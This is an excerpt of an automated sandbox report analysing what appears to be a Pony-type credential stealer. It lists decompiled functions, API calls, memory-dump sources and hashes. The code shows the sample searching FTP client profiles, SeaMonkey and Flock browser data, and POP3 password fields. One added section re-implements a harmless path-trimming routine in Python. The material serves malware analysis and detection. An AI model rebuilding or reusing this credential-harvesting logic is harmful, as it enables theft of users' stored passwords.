                                                                    							E00404351(_a4, E00401E4C(E0040242B(_t24, _t21), _t11, "\\Profiles"), ".prf", 0xbeef0000);
                                                                    							E004018B8(_t12);
                                                                    						} else {
                                                                    							_t24 = _t18;
                                                                    							if(_t18 != 0) {
                                                                    								goto L3;
                                                                    							}
                                                                    						}
                                                                    						while( *_t21 != 0) {
                                                                    							_t21 =  &(_t21[1]);
                                                                    							__eflags = _t21;
                                                                    						}
                                                                    						_t21 =  &(_t21[1]);
                                                                    						asm("cld");
                                                                    						_t17 = 0xffffffff;
                                                                    						asm("repne scasb");
                                                                    						_t26 =  *_t20;
                                                                    					} while ( *_t20 != 0);
                                                                    				}
                                                                    				return E00401636(_t16, _t17, _t20, _t26, _a4, _v8);
                                                                    			}
                                                                    0x0040816d
                                                                    0x0040816d
                                                                    0x00408181
                                                                    0x00408184
                                                                    0x0040818a
                                                                    0x00408193
                                                                    0x00408195
                                                                    0x004081a0
                                                                    0x004081a7
                                                                    0x004081ac
                                                                    0x004081af
                                                                    0x004081b5
                                                                    0x004081d5
                                                                    0x004081da
                                                                    0x004081b1
                                                                    0x004081b1
                                                                    0x004081b3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004081b3
                                                                    0x004081e2
                                                                    0x004081e1
                                                                    0x004081e1
                                                                    0x004081e1
                                                                    0x004081e7
                                                                    0x004081e8
                                                                    0x004081eb
                                                                    0x004081f0
                                                                    0x004081f2
                                                                    0x004081f2
                                                                    0x00408195
                                                                    0x00408204

                                                                    APIs
                                                                    • StrStrIA.SHLWAPI(00640B38,FTPCON), ref: 0040819B
                                                                    • StrStrIA.SHLWAPI(00645E80,FTP CONTROL,00000000,00640B38,FTPCON), ref: 004081A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                                                                    • API String ID: 0-2908215140
                                                                    • Opcode ID: 66341082fae2bfb1c9b7f3338323273fc761d7cc8eea500390e92a08a407ca7d
                                                                    • Instruction ID: 25b8ca94bf750d55a6aec51c2f4f4f00567277a79abcf93635d07a7db2700455
                                                                    • Opcode Fuzzy Hash: 66341082fae2bfb1c9b7f3338323273fc761d7cc8eea500390e92a08a407ca7d
                                                                    • Instruction Fuzzy Hash: A8018070600205BADB127A259D02FDF7A59DF81314F34413BB995791E2EA7C5A8292AC
                                                                    Uniqueness
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 62%
                                                                    			E00401E4C(void* __eax, char _a4, intOrPtr _a8) {
                                                                    				void* _t11;
                                                                    				void* _t18;
                                                                    
                                                                    				_t11 = __eax;
                                                                    				if(_a4 == 0) {
                                                                    					_a4 = 0x414847;
                                                                    				}
                                                                    				if(_a8 == 0) {
                                                                    					_a8 = 0x414847;
                                                                    				}
                                                                    				_push(_a4);
                                                                    				L0041066A();
                                                                    				_push(_a8);
                                                                    				L0041066A();
                                                                    				_t18 = E004018CF(_t11 + _t11 + 1);
                                                                    				_push(_a4);
                                                                    				_push(_t18);
                                                                    				L0041068E();
                                                                    				_push(_a8);
                                                                    				_push(_t18);
                                                                    				L00410694();
                                                                    				if(_a4 != 0x414847) {
                                                                    					_t10 =  &_a4; // 0x414847
                                                                    					E004018B8( *_t10);
                                                                    				}
                                                                    				return _t18;
                                                                    			}
                                                                    0x00401e4c
                                                                    0x00401e54
                                                                    0x00401e56
                                                                    0x00401e56
                                                                    0x00401e61
                                                                    0x00401e63
                                                                    0x00401e63
                                                                    0x00401e6a
                                                                    0x00401e6d
                                                                    0x00401e74
                                                                    0x00401e77
                                                                    0x00401e85
                                                                    0x00401e87
                                                                    0x00401e8a
                                                                    0x00401e8b
                                                                    0x00401e90
                                                                    0x00401e93
                                                                    0x00401e94
                                                                    0x00401ea0
                                                                    0x00401ea2
                                                                    0x00401ea5
                                                                    0x00401ea5
                                                                    0x00401eae

                                                                    APIs
                                                                    • lstrlen.KERNEL32(?), ref: 00401E6D
                                                                    • lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcatlstrcpy
                                                                    • String ID: GHA$GHA
                                                                    • API String ID: 2414487701-4188437078
                                                                    • Opcode ID: 56d358738f80bf6013dc8a74ae1ef7410d9387e93fbffc052ee4252ad9a379b4
                                                                    • Instruction ID: d9246f528be96856b322303a71286aa71aff6bea291017c40e37798af4e07103
                                                                    • Opcode Fuzzy Hash: 56d358738f80bf6013dc8a74ae1ef7410d9387e93fbffc052ee4252ad9a379b4
                                                                    • Instruction Fuzzy Hash: DAF03A75500208BEDF013F62CC85ADD3A9AEB50358F00C53BB8192A262D7BD8AD48B88
                                                                    Uniqueness
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E00401DF8(void* __eax, char _a4, char _a8) {
                                                                    				void* _t9;
                                                                    				void* _t15;
                                                                    
                                                                    				_t9 = __eax;
                                                                    				if(_a4 == 0) {
                                                                    					_a4 = 0x414847;
                                                                    				}
                                                                    				if(_a8 == 0) {
                                                                    					_a8 = 0x414847;
                                                                    				}
                                                                    				_push(_a4);
                                                                    				L0041066A();
                                                                    				_t6 =  &_a8; // 0x414847
                                                                    				_push( *_t6);
                                                                    				L0041066A();
                                                                    				_t15 = E004018CF(_t9 + _t9 + 1);
                                                                    				_push(_a4);
                                                                    				_push(_t15);
                                                                    				L0041068E();
                                                                    				_push(_a8);
                                                                    				_push(_t15);
                                                                    				L00410694();
                                                                    				return _t15;
                                                                    			}
                                                                    0x00401df8
                                                                    0x00401e00
                                                                    0x00401e02
                                                                    0x00401e02
                                                                    0x00401e0d
                                                                    0x00401e0f
                                                                    0x00401e0f
                                                                    0x00401e16
                                                                    0x00401e19
                                                                    0x00401e20
                                                                    0x00401e20
                                                                    0x00401e23
                                                                    0x00401e31
                                                                    0x00401e33
                                                                    0x00401e36
                                                                    0x00401e37
                                                                    0x00401e3c
                                                                    0x00401e3f
                                                                    0x00401e40
                                                                    0x00401e49

                                                                    APIs
                                                                    • lstrlen.KERNEL32(?), ref: 00401E19
                                                                    • lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcatlstrcpy
                                                                    • String ID: GHA$GHA
                                                                    • API String ID: 2414487701-4188437078
                                                                    • Opcode ID: 7614a2bc6214df05ae198ec1c5b43927a74fa08bf7555bedef183211b52c18f4
                                                                    • Instruction ID: 85b7a3d42229304cf13bff08406ee8d7f14fa5e6f164b37a1fc03a90bdb793dc
                                                                    • Opcode Fuzzy Hash: 7614a2bc6214df05ae198ec1c5b43927a74fa08bf7555bedef183211b52c18f4
                                                                    • Instruction Fuzzy Hash: 38F01C75100208BFDF017F62CC81A9D3B9AAB5035CF00D52AB91519152E7BD89E48B58
                                                                    Uniqueness
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 79%
                                                                    			E00401A27(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                    				void* _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				char _v278;
                                                                    				void** _t26;
                                                                    				intOrPtr _t29;
                                                                    				int _t32;
                                                                    				void* _t36;
                                                                    				signed int _t38;
                                                                    				signed int _t40;
                                                                    				void* _t42;
                                                                    				signed int _t46;
                                                                    
                                                                    				_t42 = __ecx;
                                                                    				_t40 = 0;
                                                                    				_t26 =  &_v8;
                                                                    				_push(_t26);
                                                                    				_push(_a4);
                                                                    				L00410790();
                                                                    				_t44 = _t26;
                                                                    				if(_t26 >= 0) {
                                                                    					_t29 = E00401082(_t26, __edi, _t44, _a4);
                                                                    					_v16 = _t29;
                                                                    					GlobalFix(_v8);
                                                                    					_t26 = _t29;
                                                                    					_t45 = _t26;
                                                                    					if(_t26 != 0) {
                                                                    						_v20 = _t26;
                                                                    						_v12 = E004018CF(_v16);
                                                                    						E00401906(_v20, _v12, _v16);
                                                                    						_t32 = GlobalUnWire(_v8);
                                                                    						_push(_a8);
                                                                    						L0041066A();
                                                                    						E0040193F(_t42, _t45,  &_v278, _a8, _t32);
                                                                    						_t36 = E004019AA( &_v278, _v12, _v16);
                                                                    						_push(_a4);
                                                                    						E0040131F(_t36, _t45);
                                                                    						_t38 = E0040157E(_a4, "CRYPTED0YUI1.0", 8);
                                                                    						_t40 = _t38 & E0040157E(_a4, _v12, _v16);
                                                                    						_t46 = _t40;
                                                                    						_t26 = E004018B8(_v12);
                                                                    					}
                                                                    				}
                                                                    				_push(_a4);
                                                                    				E0040129A(_t26, _t46);
                                                                    				return _t40;
                                                                    			}
                                                                    0x00401a27
                                                                    0x00401a31
                                                                    0x00401a33
                                                                    0x00401a36
                                                                    0x00401a37
                                                                    0x00401a3a
                                                                    0x00401a3f
                                                                    0x00401a41
                                                                    0x00401a4a
                                                                    0x00401a4f
                                                                    0x00401a55
                                                                    0x00401a5a
                                                                    0x00401a5a
                                                                    0x00401a5c
                                                                    0x00401a5e
                                                                    0x00401a69
                                                                    0x00401a75
                                                                    0x00401a7d
                                                                    0x00401a82
                                                                    0x00401a85
                                                                    0x00401a95
                                                                    0x00401aa7
                                                                    0x00401aac
                                                                    0x00401aaf
                                                                    0x00401abe
                                                                    0x00401ad3
                                                                    0x00401ad3
                                                                    0x00401ad8
                                                                    0x00401ad8
                                                                    0x00401a5c
                                                                    0x00401add
                                                                    0x00401ae0
                                                                    0x00401ae9

                                                                    APIs
                                                                    • 73D83240.OLE32(?,?), ref: 00401A3A
                                                                    • GlobalFix.KERNEL32 ref: 00401A55
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    • GlobalUnWire.KERNEL32 ref: 00401A7D
                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A85
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: GlobalLocal$AllocD83240FreeWirelstrlen
                                                                    • String ID: CRYPTED0YUI1.0
                                                                    • API String ID: 1413089268-1217275205
                                                                    • Opcode ID: 002f661a3d9b7e27aecb29e7a6e0ea1f0ccfb03bdd524ef02d32e77f62a9d182
                                                                    • Instruction ID: 291b1819b17b0b52e8b302f92d65d305c822eefb8dbf6a76828d30f87d665d9c
                                                                    • Opcode Fuzzy Hash: 002f661a3d9b7e27aecb29e7a6e0ea1f0ccfb03bdd524ef02d32e77f62a9d182
                                                                    • Instruction Fuzzy Hash: A1118671D00108BADF026FA1CC429DD7F7AEF44348F008076B915B51B1D77A8AA5AB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E0040FB14(intOrPtr* __eax, void* __ecx, void* __edi, void* __eflags) {
                                                                    				intOrPtr _v16;
                                                                    				void* _v23;
                                                                    				void* _v28;
                                                                    				intOrPtr _v32;
                                                                    				char* _v36;
                                                                    				char* _t18;
                                                                    				int _t23;
                                                                    				void* _t26;
                                                                    				void* _t30;
                                                                    
                                                                    				_push(0x40fb29);
                                                                    				asm("clc");
                                                                    				if(__eflags < 0) {
                                                                    					_t30 = __edi + 1;
                                                                    					asm("hlt");
                                                                    					 *__eax =  *__eax + __eax;
                                                                    					 *__eax =  *__eax + __eax;
                                                                    					_t26 = 0;
                                                                    					_t15 =  &_v28;
                                                                    					_push(_t15);
                                                                    					_push(_v16);
                                                                    					L00410790();
                                                                    					__eflags = _t15;
                                                                    					if(__eflags >= 0) {
                                                                    						_v32 = E00401082(_t15, _t30, __eflags, _v16);
                                                                    						_t23 = E004018CF(_t21 + 1);
                                                                    						_v36 = _t23;
                                                                    						GlobalFix(_v28);
                                                                    						_t15 = _t23;
                                                                    						__eflags = _t23;
                                                                    						if(__eflags != 0) {
                                                                    							E00401906(_t15, _v36, _v32);
                                                                    							_t15 = GlobalUnWire(_v28);
                                                                    						}
                                                                    					}
                                                                    					_push(_v16);
                                                                    					E0040129A(_t15, __eflags);
                                                                    					__eflags = _v36;
                                                                    					if(_v36 != 0) {
                                                                    						_t18 = StrStrIA(_v36, "STATUS-IMPORT-OK");
                                                                    						__eflags = _t18;
                                                                    						if(_t18 != 0) {
                                                                    							_t26 = 1;
                                                                    						}
                                                                    						E004018B8(_v36);
                                                                    					}
                                                                    					return _t26;
                                                                    				} else {
                                                                    					return __eax;
                                                                    				}
			}

Instruction addresses: 0x0040fb1f, 0x0040fb24, 0x0040fb25, 0x0040fb28, 0x0040fb2b, 0x0040fb2c, 0x0040fb2e, 0x0040fb30, 0x0040fb32, 0x0040fb35, 0x0040fb36, 0x0040fb39, 0x0040fb3e, 0x0040fb40, 0x0040fb4a, 0x0040fb4f, 0x0040fb54, 0x0040fb5a, 0x0040fb5f, 0x0040fb5f, 0x0040fb61, 0x0040fb6a, 0x0040fb72, 0x0040fb72, 0x0040fb61, 0x0040fb77, 0x0040fb7a, 0x0040fb7f, 0x0040fb83, 0x0040fb8d, 0x0040fb92, 0x0040fb94, 0x0040fb96, 0x0040fb96, 0x0040fb9e, 0x0040fb9e, 0x0040fba7, 0x0040fb27, 0x0040fb27, 0x0040fb27

                                                                    APIs
                                                                    • 73D83240.OLE32(?,?,0040FB29), ref: 0040FB39
                                                                    • GlobalFix.KERNEL32 ref: 0040FB5A
                                                                    • GlobalUnWire.KERNEL32 ref: 0040FB72
                                                                    • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040FB29), ref: 0040FB8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Global$D83240Wire
                                                                    • String ID: STATUS-IMPORT-OK
                                                                    • API String ID: 2699310191-1591331578
                                                                    • Opcode ID: d3c5594aa1a41db7cbbc94235fa4080673aeda6f723b2b3d8c29b7df58f914fc
                                                                    • Instruction ID: 90cea658c6c8212aa9fef009ba96f0a063fbcad0abcecaf4235fdd33f3ce5274
                                                                    • Opcode Fuzzy Hash: d3c5594aa1a41db7cbbc94235fa4080673aeda6f723b2b3d8c29b7df58f914fc
                                                                    • Instruction Fuzzy Hash: B0012135D04208BADF127BB2CC429AD7B79EB01348F504177B550B11A2DBBA9E949B58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 72%
                                                                    			E0040242B(void* __eflags, intOrPtr _a4) {
                                                                    				void* _t5;
                                                                    				int _t6;
                                                                    				char* _t8;
                                                                    				char* _t10;
                                                                    				char* _t15;
                                                                    
                                                                    				_t6 = E00401DF8(_t5, _a4, 0);
                                                                    				_t15 = _t6;
                                                                    				_push(_a4);
                                                                    				L0041066A();
                                                                    				if(_t6 > 1) {
                                                                    					_push(_t15);
                                                                    					if( *_t15 == 0x22) {
                                                                    						asm("cld");
                                                                    						_t3 =  &(_t15[1]); // 0x1
                                                                    						memcpy(_t15, _t3, _t6);
                                                                    					}
                                                                    					_pop(_t15);
                                                                    				}
                                                                    				_t8 = StrStrIA(_t15, ".exe");
                                                                    				if(_t8 != 0) {
                                                                    					 *((char*)(_t8 + 4)) = 0;
                                                                    				}
                                                                    				_t10 = StrRChrIA(_t15, 0, 0x5c);
                                                                    				if(_t10 == 0) {
                                                                    					 *_t15 = 0;
                                                                    				} else {
                                                                    					 *_t10 = 0;
                                                                    				}
                                                                    				_push(_t15);
                                                                    				L0041066A();
                                                                    				if(_t10 <= 3) {
                                                                    					 *_t15 = 0;
                                                                    				}
                                                                    				return _t15;
			}

Instruction addresses: 0x00402435, 0x0040243a, 0x0040243c, 0x0040243f, 0x00402447, 0x00402449, 0x0040244d, 0x0040244f, 0x00402450, 0x00402455, 0x00402455, 0x00402457, 0x00402457, 0x00402463, 0x00402465, 0x00402467, 0x00402467, 0x00402475, 0x00402477, 0x0040247e, 0x00402479, 0x00402479, 0x00402479, 0x00402481, 0x00402482, 0x0040248a, 0x0040248c, 0x0040248c, 0x00402494

                                                                    APIs
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                                      • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                                      • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                                    • lstrlen.KERNEL32(?), ref: 0040243F
                                                                    • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                                    • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcatlstrcpy
                                                                    • String ID: .exe
                                                                    • API String ID: 2414487701-4119554291
                                                                    • Opcode ID: 5ad3214b74b9cb1d56dc2c5004a94a66f38f83406c7cfc38b38d6468029d243e
                                                                    • Instruction ID: f255478a9709c47b6028815859772bdce8d28858f668d5172353d83d27d3e8c2
                                                                    • Opcode Fuzzy Hash: 5ad3214b74b9cb1d56dc2c5004a94a66f38f83406c7cfc38b38d6468029d243e
                                                                    • Instruction Fuzzy Hash: F4F0C83120429269DB2132268C09F6F6F859B92744F14003BF640B72D3D7FC989297BE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
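The function above (E0040242B) is a small path-trimming routine: it strips a leading double quote, cuts the string after the first case-insensitive ".exe", drops everything from the last backslash onward, and discards results of three characters or fewer. The Python below is an added re-implementation of that observable behaviour, written for this page; it is not code from the sample, from the leaked Pony source, or from the sandbox output. It assumes the reading of the decompiled calls given in the comments: that E00401DF8 (lstrlen/lstrcpy/lstrcat) produces a working copy of the argument, and that the values compared with 1 and with 3 are the two lstrlen results (the decompiler shows them under the reused names _t6 and _t10). The function name trim_to_directory is this example's own.

```python
def trim_to_directory(value: str) -> str:
    """Mirror of the path handling read from E0040242B (added example).

    Assumption: the sample works on a mutable copy of its argument
    (E00401DF8); Python strings are immutable, so the copy is implicit.
    """
    s = value

    # lstrlen(arg) > 1 and first byte == 0x22 ('"'): memcpy(buf, buf + 1, len)
    # shifts the string left by one, i.e. drops a leading double quote.
    if len(s) > 1 and s.startswith('"'):
        s = s[1:]

    # StrStrIA(buf, ".exe") is case-insensitive; on a hit the byte four
    # positions after the match is zeroed, so a closing quote or any
    # command-line arguments after the executable name are cut off.
    idx = s.lower().find(".exe")
    if idx != -1:
        s = s[: idx + 4]

    # StrRChrIA(buf, NULL, '\\') finds the last backslash; the string is
    # terminated there (directory only) or emptied if there is none.
    last = s.rfind("\\")
    s = s[:last] if last != -1 else ""

    # Final lstrlen(buf) <= 3 empties the result, which rejects a bare
    # drive prefix such as "C:" left over from "C:\app.exe".
    # (Assumption: the decompiler's `_t10 <= 3` compares lstrlen's return.)
    if len(s) <= 3:
        s = ""
    return s


if __name__ == "__main__":
    # Constructed inputs, not values observed in the analysis.
    for sample in ('"C:\\Program Files\\FTPClient\\client.exe" -start',
                   'C:\\Tools\\Client.EXE /silent',
                   'C:\\app.exe',
                   'client.exe'):
        print(repr(sample), "->", repr(trim_to_directory(sample)))
```

The quote and argument handling suggest the input is a quoted command line or install path of the kind stored in registry values; that is an inference from the listing, not something the report states.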

                                                                    C-Code - Quality: 100%
                                                                    			E00409E81(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char _v269;
                                                                    				void* _t18;
                                                                    				void* _t20;
                                                                    
                                                                    				_t20 = __eflags;
                                                                    				_t18 = __ecx;
                                                                    				_v8 = E004015F0(_a4, 0x26, 0);
                                                                    				 *0x416030 = 0;
                                                                    				GetCurrentDirectoryA(0x104,  &_v269);
                                                                    				E00409C3C(_t18, _a4,  *0x414869, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
                                                                    				E00409C3C(_t18, _a4, 0x80000002, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
                                                                    				SetCurrentDirectoryA( &_v269);
                                                                    				return E00401636(__ebx, _t18, __edi, _t20, _a4, _v8);
			}

Instruction addresses: 0x00409e81, 0x00409e81, 0x00409e96, 0x00409e99, 0x00409eaf, 0x00409ecc, 0x00409ee8, 0x00409ef4, 0x00409f05

                                                                    APIs
                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409EAF
                                                                      • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                                      • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                                      • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32 ref: 00409CEB
                                                                      • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                                    • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409EF4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$CloseEnumOpen
                                                                    • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                                                                    • API String ID: 3062143572-164276155
                                                                    • Opcode ID: d71b08397f7855241f59228b2f7812fc7d16d5cd59468c82a62517f7b4ab111c
                                                                    • Instruction ID: 6c0ca7a26b87c7c70e6a01aab92075298d7fe0072118fde892d006f484df090e
                                                                    • Opcode Fuzzy Hash: d71b08397f7855241f59228b2f7812fc7d16d5cd59468c82a62517f7b4ab111c
                                                                    • Instruction Fuzzy Hash: CBF01270680208BADF10AB51CD43FCD7B669B14748F1180667704751E3D7B9DAD19A48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00409F08(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char _v269;
                                                                    				void* _t18;
                                                                    				void* _t20;
                                                                    
                                                                    				_t20 = __eflags;
                                                                    				_t18 = __ecx;
                                                                    				_v8 = E004015F0(_a4, 0x27, 0);
                                                                    				 *0x416030 = 0;
                                                                    				GetCurrentDirectoryA(0x104,  &_v269);
                                                                    				E00409C3C(_t18, _a4,  *0x414869, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
                                                                    				E00409C3C(_t18, _a4, 0x80000002, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
                                                                    				SetCurrentDirectoryA( &_v269);
                                                                    				return E00401636(__ebx, _t18, __edi, _t20, _a4, _v8);
			}

Instruction addresses: 0x00409f08, 0x00409f08, 0x00409f1d, 0x00409f20, 0x00409f36, 0x00409f53, 0x00409f6f, 0x00409f7b, 0x00409f8c

                                                                    APIs
                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409F36
                                                                      • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                                      • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                                      • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32 ref: 00409CEB
                                                                      • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                                    • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409F7B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$CloseEnumOpen
                                                                    • String ID: Flock$Software\Mozilla$\Flock\Browser\
                                                                    • API String ID: 3062143572-1276807325
                                                                    • Opcode ID: 29296d0082a50089953f11c1f94118b563e7408bb88a0e5e02b1c8d3287188a8
                                                                    • Instruction ID: f5280ec9e0107380a21299960ef084744ae8c2892abc79ad58e4b51ce706d511
                                                                    • Opcode Fuzzy Hash: 29296d0082a50089953f11c1f94118b563e7408bb88a0e5e02b1c8d3287188a8
                                                                    • Instruction Fuzzy Hash: FCF01730680208BADF51AB61CC43FCD7AB5AB14749F218076BA48751E3DBB9DAD19A48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E0040E63A(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v20;
                                                                    				char* _v24;
                                                                    				char* _v28;
                                                                    				unsigned int _v32;
                                                                    				intOrPtr _v36;
                                                                    				unsigned int _v40;
                                                                    				void* _v44;
                                                                    				char _v48;
                                                                    				void* _t45;
                                                                    				char _t48;
                                                                    				char* _t50;
                                                                    				char* _t59;
                                                                    				char _t62;
                                                                    				char _t65;
                                                                    				char _t66;
                                                                    				char* _t67;
                                                                    				char _t69;
                                                                    				char _t74;
                                                                    				char _t82;
                                                                    				char* _t83;
                                                                    				char* _t84;
                                                                    				char* _t85;
                                                                    
                                                                    				_t45 = E00401F36(_a8);
                                                                    				if(_t45 != 0) {
                                                                    					_t48 = E00401FFD(__eflags, _a8,  &_v20);
                                                                    					__eflags = _t48;
                                                                    					if(_t48 != 0) {
                                                                    						_push(_v8);
                                                                    						_pop( *_t5);
                                                                    						_v40 = _v40 >> 1;
                                                                    						_t50 = E00402A3E(_v12, _v40);
                                                                    						__eflags = _t50;
                                                                    						if(_t50 == 0) {
                                                                    							_v24 = E004018CF(_v8);
                                                                    							E00401906(_v12, _v24, _v8);
                                                                    							_t84 = _v24;
                                                                    						} else {
                                                                    							_v24 = _t50;
                                                                    							_t84 = _t50;
                                                                    						}
                                                                    						while(1) {
                                                                    							_t85 = _t84;
                                                                    							__eflags = _t85;
                                                                    							if(_t85 == 0) {
                                                                    								break;
                                                                    							}
                                                                    							__eflags =  *_t85;
                                                                    							if( *_t85 != 0) {
                                                                    								_t83 = "<POP3_Password2";
                                                                    								while(1) {
                                                                    									_t59 = StrStrA(_t85, _t83);
                                                                    									__eflags = _t59;
                                                                    									if(_t59 != 0) {
                                                                    										break;
                                                                    									}
                                                                    									L10:
                                                                    									asm("cld");
                                                                    									asm("repne scasb");
